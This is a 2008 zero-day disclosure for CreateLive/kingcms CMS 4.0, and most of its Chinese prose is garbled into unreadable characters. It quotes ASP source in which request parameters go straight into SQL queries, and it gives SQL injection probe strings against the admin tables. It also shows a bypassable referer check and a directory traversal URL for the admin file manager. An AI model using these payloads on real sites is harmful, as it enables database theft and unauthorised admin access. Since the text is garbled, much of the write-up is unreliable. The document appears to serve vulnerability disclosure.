CreateLive CMS Version 4.0 0day


CreateLive CMS Version 4.0 0day.doc
by:xiaok q:391232032.771044833 time: 2008-2-4 02:10 xpsp2 ie7 iis5.1 
¾D.S.Tĸλͬ־Hell-Phantomon thin iceDDoomȺǰĻå

©֮һ

Դkingcms\User\User_Comment.asp CommentID
sub SaveModify()


CommentID=Trim(Request("CommentID")) 'ע

if CommentID="" then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>ָID</li>"
Exit sub
end if

if FoundErr=True then exit sub
sql="Select * from Cl_Comment where ChannelID="&ChannelID&" and UserID="&UserID&" and CommentID=" & CommentID 'ע
Set rsComment=Server.CreateObject("Adodb.RecordSet")
rsComment.Open sql,Conn,1,3
if rsComment.Bof or rsComment.EOF then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>Ҳָۣ</li>"
else


ûκιˡ
ȻҲ
Դ kingcms\User\inc\Cl_ClsSysTem.asp
'жύϢǷⲿ
Public Function ChkIsOuter()
Dim server_v1,server_v2
ChkIsOuter=True
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
If Mid(server_v1,8,len(server_v2))=server_v2 Then ChkIsOuter=False
End Function

һеĹ߶ãֻȥһЩϢȻpostNB򣡣
ڼҵһΪ¾Ҫдȥˡ

©֮

󲿷վҪԱˣֱӽ롣Ǹ©Ŀ
http://127.0.0.1/User/User_Comment.asp?ChannelID=1&SearchContent=11&Query=+ѯ

ôд
Դ kingcms\User\User_Comment.asp
SearchContent = Trim(request("SearchContent"))

Sub main()

if SearchContent<>"" then
strSql2=strSql2 & " and M.CommentContent like '%" & SearchContent & "%' "


%'and (select count(*) from admin)>0 and '%'='
%'and (select count(*) from cl_admin)>0 and '%'='

Ȼ

һûadminĻش

ڶûcl_admin,Ϊcl_adminڣĻش

ĳЩ˶`ֻܿ֡

©֮

ҪµȨޣҪⲿύƹҲȲˣ׼ʱ
賿200824 04:41:07
ûԱ½Ȼ
/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../Data

ᷢ/*Ϊadmin½ģԡ*/õô
Admin\Admin_Files.asp
if ThisDir<>"" then
ThisDir=Replace(ThisDir & "/","//","/")

ֳˣдˡ

©֮

ԴһעļΪlogadminһݿ⣬ûüֵ
 


